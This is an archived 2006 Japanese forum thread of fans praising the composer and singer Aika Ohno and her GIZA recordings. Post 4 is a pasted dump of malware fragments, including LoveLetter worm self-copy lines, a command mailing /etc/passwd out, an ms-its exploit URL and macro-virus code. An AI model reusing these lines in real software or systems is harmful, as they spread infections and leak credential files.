5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【GIZAの】大野愛果は美しいPart.2【美少女】

1 :名無しの歌姫:2006/10/07(土) 20:24:47 ID:ZNWix5+y
美しいGIZA娘の作曲家
大野愛果さんを語りましょう!

前スレ
【GIZAの】大野愛果Part.1【精鋭】
http://music5.2ch.net/test/read.cgi/musicjf/1119885932/


2 :名無しの歌姫:2006/10/07(土) 20:30:50 ID:st0U9mP6
容姿も歌唱力も音楽の才能も全てブス内より優れているのに
なんでデビューしなかったんだろ?

3 :名無しの歌姫:2006/10/07(土) 20:41:05 ID:cMwQKo2H
それは、大野さんは恥ずかしがりやさんだからだよ

4 :名無しの歌姫:2006/10/08(日) 00:03:29 ID:TQoX1KLP
ak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

5 :名無しの歌姫:2006/10/08(日) 00:34:54 ID:Y+es2HQ7
たまたまsweet velvetのアルバムが210円で売ってたから、買ったよ。

2.「I JUST FEEL SO LOVE AGAIN 〜そばにいるだけで〜」

大野(&徳永)ver.のほうがいいけど、原曲の古井ver.もそんなには悪くないと思った。
(この曲はほんとメロディがいいね)

このアルバムは「大野&古井」が多いけど、
その後…
ゴッドハンド古井は、大野さんではく、ゆりっぺを選んだってわけか。

それじゃあ…
ガネのニューアルバムでもまた聴くか。
(これがいいだよね。さすがガーネット!さすがゆりっぺ!さすがナナーって感じで。)

6 :名無しの歌姫:2006/10/08(日) 01:01:17 ID:jzdWEVif
美しいメロディだな

7 :名無しの歌姫:2006/10/08(日) 11:57:48 ID:QM0Vts6X
美しい

8 :名無しの歌姫:2006/10/08(日) 12:52:59 ID:CBLP57N+
大野曲+サイバーサウンド編曲+倉木ボーカルが神だったな。

9 :名無しの歌姫:2006/10/08(日) 19:25:15 ID:y9gJZ9f3
死ねじ9

10 :名無しの歌姫:2006/10/08(日) 19:25:46 ID:y9gJZ9f3
死ねじ10

11 :名無しの歌姫:2006/10/08(日) 19:26:18 ID:y9gJZ9f3
死ねじ11

12 :名無しの歌姫:2006/10/08(日) 19:26:49 ID:y9gJZ9f3
死ねじ12

13 :名無しの歌姫:2006/10/08(日) 23:14:29 ID:BzY1tnM7
かなり美しい

14 :名無しの歌姫:2006/10/09(月) 11:35:19 ID:MjCSJWX9
大野愛果の2nd ALに倉木の初期のカバ−が入っているけどすごいイイ!その後で倉木ver.を聴くと
萎える。alwaysなんか、聴くと特に。倉木の高速ver.を何なくこなしてる歌唱力、声量、声質全ての点で倉木より上。
全部英詞とは言え、格の違いを見せつけられる。


15 :名無しの歌姫:2006/10/09(月) 23:24:27 ID:ESEmj4Bg
大野さんあげ

16 :名無しの歌姫:2006/10/10(火) 15:36:27 ID:pxhppOf/
相変わらず過疎っている age

17 :名無しの歌姫:2006/10/11(水) 00:08:44 ID:2tca4NXy
sage

18 :名無しの歌姫:2006/10/11(水) 22:23:19 ID:Bh6YeM+5
今回の大野さんのコラムなんか悲しい

19 :名無しの歌姫:2006/10/11(水) 23:06:10 ID:LF4I+KPU
姪っ子甥っ子ってよく登場するけど、ほんとに姪甥?
溺愛ぶりが尋常じゃないような。

もしかしたら…いや、それ以上先を言わせないでくれ

20 :名無しの歌姫:2006/10/11(水) 23:07:01 ID:R7d8oO86
考えすぎw

21 :名無しの歌姫:2006/10/11(水) 23:08:39 ID:LF4I+KPU
だね。

22 :名無しの歌姫:2006/10/12(木) 01:21:38 ID:dbKyzt0i
妊娠?

23 :名無しの歌姫:2006/10/12(木) 10:35:43 ID:1EGmFaTU
別にいいじゃない。
プライベ‐トの事だし。
神曲だけ作ってくれば
それで良いんじゃない。

24 :名無しの歌姫:2006/10/12(木) 18:44:26 ID:K0Hy8Zmf
それに美しいしな

25 :名無しの歌姫:2006/10/12(木) 22:04:33 ID:r4N1tC7Y
んだんだ。
てかコラムを見てると詩も書けそうな気がするけど。

26 :名無しの歌姫:2006/10/12(木) 23:52:08 ID:qUo9GKDK
いい女だ

27 :名無しの歌姫:2006/10/13(金) 02:56:13 ID:RRj7rFTu
角度によっては似てるな
エイベックス期待の新人だそうだ
http://yaplog.jp/19850205/

28 :名無しの歌姫:2006/10/13(金) 14:19:58 ID:wt6RrS0m
>>27
くまえりに似てる

29 :名無しの歌姫:2006/10/13(金) 23:36:33 ID:wt6RrS0m
ちょ!GIZAの公式サイト見ろ!
24枠が変わって今までの倉木のポジションが大野さんになってる(笑)
つーかなぜ倉木が一番右にいったんだ?

30 :ゆりっぺ&大野ファン:2006/10/13(金) 23:49:55 ID:LJeiUpdw
左ほど強いのか?右ほど強いのか?とよく考えたけど、
これはきっと、真ん中が強いんだよ。

31 :名無しの歌姫:2006/10/14(土) 00:06:14 ID:kXy0jk+t
まあ大野マンセーの俺には嬉しい

32 :名無しの歌姫:2006/10/14(土) 00:31:38 ID:c5owfjCa
いままでは左が1番枠だったのが右側が1番枠になったんだろ
それなら今の並びは納得できるだいたい岩田やタンバが二番枠にきてる事自体(ry

33 :名無しの歌姫:2006/10/14(土) 00:35:40 ID:dp0cWYTz
んなわけねーだろ

34 :名無しの歌姫:2006/10/14(土) 01:53:27 ID:kXy0jk+t
旧 http://image.blog.livedoor.jp/kobacrow/imgs/e/5/e553f1c5.jpg
新 http://image.blog.livedoor.jp/kobacrow/imgs/4/5/4589db20.jpg

うむ。>>32の通りかもな。ちょっと変動もあるみたいだけど。
個人的に竹井が降格したことが残念。

35 :名無しの歌姫:2006/10/14(土) 10:01:34 ID:n9E6ftYq
>>22
IDがdb...

36 :名無しの歌姫:2006/10/14(土) 13:47:15 ID:5sbHuPcs
db加入厨乙www

37 :名無しの歌姫:2006/10/15(日) 19:48:26 ID:EGof9jQ1
JPG画像

38 :名無しの歌姫:2006/10/16(月) 01:11:51 ID:6vflUklh
俺は順番より画像がパーーーっと表示されてることに感動した
今まではマウスもってくと顔がピコッと表示されたのに、
今日みてみたら全員集合!って感じでずらーーっと表示されてるし。

39 :名無しの歌姫:2006/10/16(月) 13:35:34 ID:rMNOPEsI
大野さんいいお友達がいっぱいいるようで羨ましい

40 :名無しの歌姫:2006/10/16(月) 15:27:53 ID:1hZFDeZz
>>39
人柄がいいんだろうね

41 :名無しの歌姫:2006/10/16(月) 21:16:25 ID:BJ+Dn4eg
♪「I JUST FEEL SO LOVE AGAIN 〜そばにいるだけで〜」

この曲はほんとに綺麗なメロディで神曲レベルなのに。
(AZUKI七が日本詞をつけて、大野さんが日本詞で歌っていたらなぁ。
ガーネットクロウの♪「夢みたあとで」レベルの楽曲だと思うんだが…、もったいない)

42 :名無しの歌姫:2006/10/17(火) 01:08:44 ID:EkH5Y7e6
だきしめたい

43 : ◆o0JMpFh/TM :2006/10/17(火) 09:25:38 ID:u5sjxlba
次はしめじチャンス

44 : ◆o0JMpFh/TM :2006/10/17(火) 09:26:20 ID:u5sjxlba
しめじ44

45 :名無しの歌姫:2006/10/17(火) 13:02:36 ID:uXCTL68V
3rdアルバムのリリースをリクエストってどこにメール送ればいいの?

作曲業はしばらく休止して、充電するのも必要だと思うよ
そしたらまた神曲作れるようになるはず
その間にカバーアルバム、2枚組リリース希望

46 :名無しの歌姫:2006/10/17(火) 15:27:44 ID:dm2fAY+E
AZUKIの詩を大野さんが歌うのか・・・
なんかしっくりこないような。英詩でも俺は十分満足。
大野さんの神がかり的なメロディと天に届くような歌声でおなかいっぱい。
Shadows of Dreamsの4分26秒あたりからの「my angel」って歌うところは背筋がゾクゾクくる。

47 :名無しの歌姫:2006/10/18(水) 00:32:53 ID:tH+NWz3Z
かわいい

48 :名無しの歌姫:2006/10/21(土) 00:56:19 ID:neqhLePI
大野のアルバム、どこのブックオフにもない・・・


49 :名無しの歌姫:2006/10/21(土) 01:13:00 ID:BCtrz6ko
so

50 :名無しの歌姫:2006/10/21(土) 01:13:36 ID:BCtrz6ko
shi

51 :高校生@:2006/10/26(木) 01:36:37 ID:cI+WeX3z
age

52 :名無しの歌姫:2006/10/27(金) 17:19:22 ID:/ZmgWczS
>>48
2ndは新宿の某中古屋で買ったが、1stだけが見つからない。 一体、何枚生産されたのだろうか?



53 :名無しの歌姫:2006/10/28(土) 03:05:01 ID:uC3Azz0e
倉木の歌で大野を知った。
結構いい曲創るな〜と思ったが最近耳にしないね。
へーこの人自分でも歌ってるんだ。声が良かったら聞いてみるかな。

54 :名無しの歌姫:2006/10/28(土) 04:05:12 ID:hgFQW+bS
大野のコラムを見てると、のだめカンタービレのヒロインとダブる(笑)学生時代はこんなんだったんだろーか

55 : ◆dVFnJOVtWU :2006/10/28(土) 10:21:57 ID:SkRxz8Co
しめじ55

56 :名無しの歌姫:2006/10/28(土) 11:03:53 ID:N+/uSUwd
大野愛果さんが手掛ける
倉木麻衣シングル
「白い雪」で
大野さんがいい仕事
してくれると期待

57 :名無しの歌姫:2006/10/30(月) 09:09:13 ID:SmNz1o7W
>>56
そして3rdアルバムで大野さんにカバ‐されて倉木との実力差を見せつけられるのかw

58 :名無しの歌姫:2006/11/02(木) 15:11:34 ID:PPC1eb2b
生きる意味 問うが一番 意味が無い
大野さん素敵ですww

59 :名無しの歌姫:2006/11/04(土) 14:58:54 ID:mk672kOt
age

60 :名無しの歌姫:2006/11/04(土) 15:00:17 ID:1RaisiA/
川柳になってるのか

61 :名無しの歌姫:2006/11/04(土) 23:39:02 ID:noTai7j5
愛果タン

62 :名無しの歌姫:2006/11/05(日) 00:02:22 ID:rbCDqfsM
>>53
殆んど英語詞だけど歌唱力はGIZAの中では最高。何で歌手活動が制限されているのか解らない程。

63 :名無しの歌姫:2006/11/05(日) 00:04:06 ID:QLP3A/W7
それがGIZAクォ(ry

64 :名無しの歌姫:2006/11/05(日) 22:38:21 ID:uWFVXfuk
>>62
大野さんが出てくると非作曲アーティストが食われる可能性があるからGIZAはそれを恐れてるのだと思われ。
しかし、今の状況を見ると大野投入したほうがいいと思うけど。上木もメジャーデビューしてからなんかパッとした曲出してないし。
てか個人的に竹井にもうちょい力をいれるべきだと思う。

65 :名無しの歌姫:2006/11/05(日) 23:36:59 ID:1SM8tzFP
次は死ねじチャンス!

66 :名無しの歌姫:2006/11/05(日) 23:37:41 ID:1SM8tzFP
死ねじ66

67 :名無しの歌姫:2006/11/06(月) 00:31:28 ID:2XTSjUal
>>56
倉木の新曲はあまり評判よくないみたいだが

68 :名無しの歌姫:2006/11/06(月) 00:37:33 ID:87J2TQKc
もう才能が枯渇した

69 :名無しの歌姫:2006/11/07(火) 20:35:16 ID:cXsrYh/I
次は死ねじチャンス!

70 :名無しの歌姫:2006/11/07(火) 20:35:56 ID:cXsrYh/I
死ねじ70

71 :名無しの歌姫:2006/11/07(火) 22:16:05 ID:4Gt58Vd/
某巨大フル着板に愛果アルバム大量うpしてるネ申がいる!
携帯の人は探してみれ

72 :名無しの歌姫:2006/11/09(木) 11:38:52 ID:tHXwVH9F
今年作曲提供したシングル曲でよかったと思う曲は、
悲しいほど貴方が好き
の1曲だけだった

来年は作曲を中止して1年間作曲充電期間にし、
その間にカバーアルバム2枚リリースしてほしい

73 :名無しの歌姫:2006/11/09(木) 18:19:01 ID:fglV36P7
保守

74 :名無しの歌姫:2006/11/11(土) 18:58:16 ID:l82w670c
美しい

75 :名無しの歌姫:2006/11/11(土) 20:13:08 ID:WAH7JzY5
大野さち子ちゃん

76 :名無しの歌姫:2006/11/11(土) 20:18:00 ID:GGORe/lW
1さん乙

77 :名無しの歌姫:2006/11/11(土) 22:07:28 ID:t8enyWO0
今さら>>1乙かよ!

78 :名無しの歌姫:2006/11/12(日) 01:54:53 ID:/dEVX+KI
大好き

79 :名無しの歌姫:2006/11/13(月) 23:47:43 ID:S9QoH5Ba
>>54
亀レスですけど、さすがに音譜位は読めたでしょう。
(のだめは音符が読めないし、意味すら解ってない)

80 :名無しの歌姫:2006/11/14(火) 00:59:52 ID:KAOdX2q8
のだめの方が天然って感じかも

81 :名無しの歌姫:2006/11/14(火) 02:33:11 ID:R8RY4srK
Shadows of Dreamsの徳永アレンジは神アレンジ連発だけど、
Secret Gardenの唯一のReach forは没アレンジ

池田は全アレンジ神レベル


82 :名無しの歌姫:2006/11/14(火) 12:43:52 ID:XJbip+as
>>81
Reach for the skyは彼女の曲の中でもかなり好きな曲だからもうちょっとアレンジがんばってほしかったね。

83 :名無しの歌姫:2006/11/16(木) 00:58:17 ID:I6UsWevv
今回の大野さんのコラムちょっと元気がでる。

84 :名無しの歌姫:2006/11/18(土) 22:42:18 ID:crC8z7Qg
死ねじって何?
意味が分からないんだが・・・

85 :名無しの歌姫:2006/11/19(日) 08:15:11 ID:4ZgXpCOJ
>>84
確かGIZAの中に2chがつけたあだ名のバンドメンバーが居て、
ねらーの標的にされている香具師の事と思われ。死ねじじゃなくて
しめじではなかったかな。それが変形して死ねじになったと思われ。

86 :名無しの歌姫:2006/11/19(日) 13:51:34 ID:tjE22WXr
>>85
岩井がライブ中にしめじを育てたい発言してからじゃないか?

2006年も結局復活の兆しはなかったな
悲しい貴方くらいか

87 :名無しの歌姫:2006/11/19(日) 16:20:50 ID:Cu7Dis5M
次は死ねじチャンス!

88 :名無しの歌姫:2006/11/19(日) 16:21:28 ID:Cu7Dis5M
死ねじ88

89 :名無しの歌姫:2006/11/19(日) 23:47:52 ID:OubZGFMN
次も死ねじチャンス!

90 :名無しの歌姫:2006/11/19(日) 23:48:29 ID:OubZGFMN
死ねじ90

91 :名無しの歌姫:2006/11/21(火) 04:35:11 ID:TD606xZj
スレタイの美少女がどうも引っかかる。
どう考えても少女じゃないだろ。

92 :名無しの歌姫:2006/11/21(火) 11:44:13 ID:LOWkGfx+
美少女じゃなくて天才作曲家の方が良かったんじゃない。本来はアーチストなんだけど。


93 :名無しの歌姫:2006/11/21(火) 12:18:01 ID:7hqwyjMV
美女にしときゃあよかったのにね

94 :名無しの歌姫:2006/11/21(火) 13:02:12 ID:LOWkGfx+
このスレの消費速度だと
大野さんが30歳になっても美少女のままだなw

95 :名無しの歌姫:2006/11/21(火) 14:35:39 ID:mV6nL9wN
美処女

96 :名無しの歌姫:2006/11/22(水) 22:32:13 ID:B5vY4CaU
大野さんは永遠に少女だよ

97 :名無しの歌姫:2006/11/22(水) 22:37:57 ID:d++QKsCz
大野さんって30歳くらい?
細くて綺麗だよね。

98 :名無しの歌姫:2006/11/23(木) 14:53:20 ID:LMwrd8w8
>>97
今、29歳。本人はシンガーソングライターになりたかったんだけど、
倉木に作った曲が売れてしまった為に、作曲専門にされちゃった人。
GIZAのアーチストに提供している曲のカバーアルバムが2枚出てる。
「君が育った」の一言だけ、日本語で、後は全部英語詩。作詞は外人。

99 :名無しの歌姫:2006/11/23(木) 16:29:10 ID:FRbCnD97
死ねじ99

100 :名無しの歌姫:2006/11/23(木) 16:29:47 ID:FRbCnD97
死ねじ100

101 :名無しの歌姫:2006/11/24(金) 23:34:36 ID:Nhjml4yn
いい女だ

102 :名無しの歌姫:2006/11/25(土) 01:15:59 ID:4nC2mkwy
>>98
君が育ったってなに?
初めて聞いた

103 :名無しの歌姫:2006/11/25(土) 02:05:24 ID:+cFzJULC
某サイトにアルバム2枚ともアレしてあった。初めて聴いた。いいね。

104 :名無しの歌姫:2006/11/25(土) 03:02:49 ID:+cFzJULC
alwaysのバックコーラスは倉木本人?やたらボーカルが全面に出してあるけど・・・

105 :名無しの歌姫:2006/11/25(土) 13:07:20 ID:udfGVm0R
いい雌ゴリラだ

106 :名無しの歌姫:2006/11/25(土) 22:17:07 ID:LNj0aDCt
>>102
スマソ。空耳でした。1stアルバムのShadows of Dreamsの12曲目の
Fair Playの[Give me gum and soda pop」の部分がそう聞こえて
いただけでした。聴いていても気が付かなかったので、歌詞カードをみたら
英語でした。自分も何で此処だけ日本語なのか?と不思議には思ってましたがw

107 :名無しの歌姫:2006/11/26(日) 00:18:57 ID:H4f4o3l3
上手いねえこの人。CDだと倉木と同じような編集してあるみたいで
ボーカルが前面に出てないから一度は生ライブで聴いてみたいな。
できればアンプラグドでさ。
やっぱこのまま作曲家として表に出ないのはもったいないなあ。
おいら、このリズム感と声のバランスはすごく好き。
Reach for the skyの評価が低いようだけどおいらは好きだなあ。
でもLove,Day After Tomorrowは倉木バージョンの方が好き。

108 :名無しの歌姫:2006/11/26(日) 03:38:55 ID:QCUOdXQ5
secret〜も倉木のほうが好きだな。大野のは濃ゆくて疲れるw
冷たい海は原曲以上に神がかってるな。幻想的でひんやりした仕上がりで。
売ろうとして入れた倉木のラップは邪魔に感じるけど。

109 :名無しの歌姫:2006/11/26(日) 04:43:52 ID:pzd5G/eN
冷たい海なんてあったかなと思ったらThe Frozen Seaの文字が。
ダウソ組だから気付くのにも一苦労だw早速落としてみるよ。

110 :名無しの歌姫:2006/11/26(日) 05:54:23 ID:pzd5G/eN
冷たい海を聴いた。これはなんとも幻想的だねえ。
でも曲調からは海よりも森っぽい印象を受けるなあ。
何千年も前の日本の地、ある御神木の前で巫女が祈りを捧げてるような。
これにひんやりとしたボーカルが合わさってなんとも不思議な感じ。

それにしてもなんでここでも倉木なんだ?のぺ〜っとした
倉木ボーカルの声量と時間のバランスを大きく取りすぎ。
繊細な大野の時間帯が潰されてこれじゃどっちの曲だかわからないよ。
これは売るためのアレンジじゃない気もするなあ。
なんだか「大野はあくまで倉木のカバーだ」みたいな会社の意図すら感じる。
それに「印税は倉木と折半な、当然だろCD出させてやってんだからよ」みたいな感じも。
倉木Verの冷たい海、単体でも曲名にあったすごくいい曲なんだから
大野Verではこんなに前面に出してこなくてよかったのに。

・・・この人、GIZA?じゃどういう扱い受けてるんだろ?飼い殺し?


111 :名無しの歌姫:2006/11/26(日) 07:52:36 ID:pzd5G/eN
あ、ドラゴンスピリットってシューティングゲームの最後の方のステージ。
なんか、急にきた。石畳のステージだったか、こういう雰囲気だったような・・

112 :名無しの歌姫:2006/11/26(日) 13:09:25 ID:H9NRZ04G
>>110
完全に飼いごろしですよ大野さん。大野信者8年やってる私も良くやってられるな。と思います。自分だったら強引にでもGIZAなんか脱出しますよ。

113 :名無しの歌姫:2006/11/26(日) 13:48:14 ID:nP7CnxRf
自分、大野が歌えることを知ったのはほんの数日前。
作曲家としては倉木のアルバム出てから知ったんだけどね。
倉木のCDを知っていただけにすんなり大野のカバーリングが耳に入ってきたのもあるだろうけど
この人、英詩でも倉木以上に歌えるんだなって思った。声も惹かれるとこあるし。
倉木の英詩発音は拙い日本語英語っぽいから尚更か。

作曲家で成功したのはGIZAのお陰なんだろうけど、歌手としては潰されてるわけか。
もし過去を全て伏せて歌手としてひっそり表に出てもたぶん売れないよね。
会社のバックアップが無いだろうし。一気に最大手に移籍でもしない限り・・・

114 :名無しの歌姫:2006/11/26(日) 19:07:54 ID:WMYg7vJw
☆嵐のリーダー・大野智を応援しよう☆

ttp://www.youtube.com/watch?v=iVoyMQcdLy8
ttp://www.youtube.com/watch?v=brqlLHQNeJs
レベルの高いダンスの実力

ttp://www.youtube.com/watch?v=wIkOu0tnCQ4
ttp://www.youtube.com/watch?v=wIkOu0tnCQ4
ナイスな天然ボケ具合

これほど非凡な才能を持ちながらイマイチ名の知れていない大野智。
動画はほんの一部です。まだまだたくさんの大野の面白動画があります。
動画を観て彼を気に入ったらどんどん彼の素晴らしさを普及しよう。
2chの力で大野をメジャーなアイドルへ!

嵐の大野智を応援してあげようぜ
http://ex17.2ch.net/test/read.cgi/news4vip/1164456153/
こっちもよろしく

115 :名無しの歌姫:2006/11/26(日) 19:12:07 ID:u65RXYDV
大野ファンって倉木さんの事好きじゃない人が多いね・・・

116 :名無しの歌姫:2006/11/26(日) 21:06:51 ID:xQppsmuc
>>115
俺は元倉木ファン。大野さんそ知ったきっかけも倉木。
今では完全に倉木はどっちでもいい存在になってしまったが別に嫌いなわけじゃない。

117 :名無しの歌姫:2006/11/26(日) 21:22:13 ID:YYQ3NQZN
俺も倉木は好きだよ。4thアルバムからはずいぶん上手く歌ってる感じだし。
でも最近はあんまりいい感じがしないなあ。昔の曲はいまでも好きだけどね。
大野を聴いたのはたまたまこのスレを見つけたからみたいなもん。
それで、あー上手いなぁと。倉木の歌い方は大野を真似たのか、それとも
大野が倉木のイメージを変えないように歌っているのか。
何となく通じるものはあると思う。質は全然違うと思うんだけどね。

118 :名無しの歌姫:2006/11/26(日) 22:36:30 ID:tk3SR1qu
いい女だ

119 :名無しの歌姫:2006/11/27(月) 01:10:40 ID:BA+szOIJ
>>112
大野はBeヲタだから平気なんじゃないか?
普通の感覚だったら栗林みたいに逃げて行くはずw

しかも織田栗林時代とは違って、提供先が作曲できないことが多いので、
c/w、アルバム曲まで面倒みないといけないから、かなりの重労働だと思うし。

120 :名無しの歌姫:2006/11/27(月) 23:22:54 ID:Nrbgmril
いい女だ

121 :名無しの歌姫:2006/11/28(火) 00:21:49 ID:lJ8//BCP
いいゴリラだ

122 : ◆bNViSpIqx2 :2006/11/28(火) 10:34:17 ID:+ixNecCb
次はしめじチャンス

123 : ◆bNViSpIqx2 :2006/11/28(火) 10:35:20 ID:+ixNecCb
しめじ123

124 :名無しの歌姫:2006/11/28(火) 22:10:10 ID:P1/PV+hX
The Frozen Seaは倉木のコーラスカットで池田アレンジにすれば
よかったと思う

アルバムSecret Gardenは音が悪いな
キャンフォゲやStart in my lifeのストリングスは臨場感なさすぎ。
せっかくの神曲なのにもったいない

あとリミックス3曲要らなくねえ?
リミックスじゃなくカバー収録して欲しかった

125 :名無しの歌姫:2006/11/28(火) 23:49:54 ID:Ypvg55VZ
オイラは大野愛果さんの曲が大好き
繊細でそれでいて力強くそして温かい、素晴らしいメロディー。
大野さん作曲なら上原だろうが三枝だろうが岸本だろうが聴いてます
倉木さんも好きなんですが、それは大野さん曲を歌う倉木さんが好きなだけですね。
もちろん大野さん自身の歌声も素晴らしいと思います

126 :名無しの歌姫:2006/11/29(水) 14:52:10 ID:jH1yNNFT
>>124
リミックスに関しては禿同。
てか大野さんに限らずリミックスはあまり好きじゃない。

127 :名無しの歌姫:2006/11/30(木) 00:09:11 ID:LwB7JPEe
正直、紅白出る歌手なんか目じゃないよな。

128 :名無しの歌姫:2006/11/30(木) 00:34:44 ID:VKd10W/G
大野曲は好きなんだけど、集めて聞けるのは倉木くらい。せいぜい愛内までなのです。
他アーで楽曲提供あったさいには教えてくだされ(>人<)

129 :名無しの歌姫:2006/11/30(木) 09:33:20 ID:xFd6vNMU
昨日テレビでジャニ‐ズが女王中島みゆさんの提供曲やってたけど何あれ?何であんなのテレビに出れるの?女王の神曲破壊してんじゃん。何で大野さんの曲で愛内が出た方がよっぼどいいのにテレビに出られないか納得出来ない。不公平だよ。

130 :名無しの歌姫:2006/11/30(木) 22:34:00 ID:1az0jXIc
日本語でも歌ってほしい

131 :名無しの歌姫:2006/11/30(木) 22:56:26 ID:xFd6vNMU
>>128
ZARD 特にトキメモ3のHEROは神 その他にもZARDに何曲かあるので探してね。

132 :名無しの歌姫:2006/11/30(木) 23:27:09 ID:6XXgtwEL
>>128
竹井詩織里に提供する曲はいい曲多いと思うよ。
GIZAでは一番アーティストっぽい雰囲気や楽曲。
「君を知らない街へ」や「世界 止めて」「きっともう恋にはならない」など何気に気合い入ってる曲が多いよ。
特に「君を知らない街へ」は一度でいいから聴いてみて欲しい隠れた名曲。

133 :名無しの歌姫:2006/12/01(金) 04:32:00 ID:dRTXTvhw
>>131
heroはメロディは好きだが、大賀のドラム音は好きになれない
間奏のシンセサイザーはいいんだが。

眠る君の〜は曲とアレンジは好きだが三枝が好きになれない

やっぱ3rdアルバム出して欲しい
売れる売れない関係なしに大野のCDを求めてる人はいるはず


134 :名無しの歌姫:2006/12/01(金) 06:09:54 ID:sNvMEODz
しかし歌い手としての知名度が致命的・・・

135 :名無しの歌姫:2006/12/01(金) 16:42:27 ID:Vq7z9mYP
GIZA脱出して大手に売り込めばいいんだけどな。宣伝力が半端じゃないし。どこかしら採用してくれるよ。大野さんのスキルなら。でも本人にその気がないみたい。勿体ない。

136 :名無しの歌姫:2006/12/02(土) 22:45:31 ID:bEgczOUY
かわいい

137 :名無しの歌姫:2006/12/03(日) 00:58:59 ID:Fh0D6/ky
ご尊顔はどんなのですか?出てこないんですけど。

138 :名無しの歌姫:2006/12/03(日) 01:28:12 ID:CdI0X0lm
GIZAの時点で盛れない

139 :名無しの歌姫:2006/12/03(日) 21:53:25 ID:mDuZ5w7w
映画とか見てるのかな

140 :名無しの歌姫:2006/12/03(日) 22:21:33 ID:ngwNB3dQ
>>139
ポルノ映画を好んで観ていますよ

141 :名無しの歌姫:2006/12/03(日) 23:00:10 ID:VJue0Q/4
んなことない。

142 :名無しの歌姫:2006/12/04(月) 18:45:09 ID:tabOQObd
竹井詩織里って声が透き通っていいな。かつての谷村有美みたい。倉木には徳永他にやらせて大野さんと竹井のコンビでどんどん売り出して欲しいな竹井の事務所の社長があれなのが心配だけどね。

143 :名無しの歌姫:2006/12/05(火) 00:02:29 ID:O/xrLIl2
ぶっちゃけ竹井と大野さんの相性あまりよくない。
個人的に竹井大好きだけど。

144 :142:2006/12/05(火) 17:22:22 ID:/tS2ymUQ
しかしそれを言ってたらZARDと相性も良くないしキリが無い。結局、愛内と倉木にしか作れない事になっちゃう。シンガーの方も努力して欲しいな。

145 :名無しの歌姫:2006/12/05(火) 22:58:25 ID:jUapZDo3
美しい

146 :名無しの歌姫:2006/12/06(水) 21:57:36 ID:bsyuixNH
倉木の「白い雪」聴いた。完全に金属疲労起こしてる。
スター選手の晩年の姿を見てるみたいで悪い意味で泣けた。
充電期間を置かないともう無理だわ。会社は休ませないと
思うけど、このままの状態が続くのは、嫌だ。耐えられない。

147 :名無しの歌姫:2006/12/06(水) 23:20:31 ID:kacpJT8N
>>146
同感
来年は作曲業は休業してセルフカバーアルバム出してほしい

大野の曲で1番の神曲って、明日もし君が壊れてもだと思う。
またこれくらいとは言わなくても、倉木に良曲提供してた頃くらいに回復してくれたら。

148 :名無しの歌姫:2006/12/07(木) 23:10:16 ID:Z9/Oq25X
かみつきたい

149 :名無しの歌姫:2006/12/08(金) 05:56:48 ID:ky8D00qc
オキニを数曲聴いてからあややの奇跡の香りダンス聴いたらなぜか笑いが出た。
もしかして失笑ってのはこういうのを言うんだろうか・・・?

150 :名無しの歌姫:2006/12/09(土) 12:54:15 ID:X3GTev4T
>>149
オキニって誰の曲? 大野曲>>>>>あややという事でOK?

151 :名無しの歌姫:2006/12/09(土) 17:34:45 ID:SnsVYxZE
このスレに来てるというそれだけで間違いないだろうが。
それとも何か?大野曲<<<<<あややとでも?このたわけが!

152 :150:2006/12/09(土) 19:16:57 ID:X3GTev4T
>>まあ、まあ。そう怒らずに。あなたに誤解を生んでしまい怒らせた
事に対して謝罪します。すいません。私はあややが最近どういう曲を
出しているかわからないためにそういう表現になってしまいました。
勿論、私は大野さんのメロディは大好きですし、大野さんのCDアルバムも
2枚とも持っています。更にシンガーソングライター志望だったのに
作曲専門にさせられて本人が飼い殺し状態である事も知ってます。
岸和田市で親と暮らしている事もブログを通じて知りました。
ですので、私は間違ってもそんな事思いません。むしろ大野さんを
酷使して、曲のレベルを下げさせてしまった会社のやり方に怒りすら
覚えます。シンガーとしても一流の人を表に出さず中に封じ込め、
下働きのように扱う会社の態度に対してもです。これで御解りでしょうか。


153 :名無しの歌姫:2006/12/09(土) 21:33:58 ID:SnsVYxZE
このスレに来てるというそれだけで間違いないだろうが(´∀`)
それとも何か?大野曲<<<<<あややとでも?このたわけが(*´∀`*)

154 :名無しの歌姫:2006/12/10(日) 11:03:14 ID:V4BHl1DO



   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、今年のクリスマスはどこ行こうか?
    | トゝ-_-イl   、ヽ          あなたと一緒ならどこでもいいよ♪
──(_つと_)─ と_)─────



155 :名無しの歌姫:2006/12/10(日) 23:03:46 ID:iuzhXC6Y
いい女だ

156 :名無しの歌姫:2006/12/11(月) 10:27:20 ID:oZm6A6XT
>>154
個人的には南極に連れて行きたい。

157 :名無しの歌姫:2006/12/11(月) 20:42:38 ID:OOjUT1xN


